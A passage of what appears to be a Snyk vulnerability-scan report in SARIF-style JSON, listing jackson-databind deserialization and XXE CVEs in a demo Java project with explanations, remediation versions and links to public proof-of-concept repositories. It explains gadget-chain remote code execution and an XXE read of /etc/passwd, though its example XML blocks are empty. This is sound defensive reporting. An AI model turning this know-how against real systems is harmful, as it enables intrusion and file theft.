It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-25649) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › 
com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-35490) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted 
Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. 
When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-35491) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for 
Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. 
When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-35728) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for 
Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36187) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced 
through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36184) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36186) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* 
Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36180) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36183) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* 
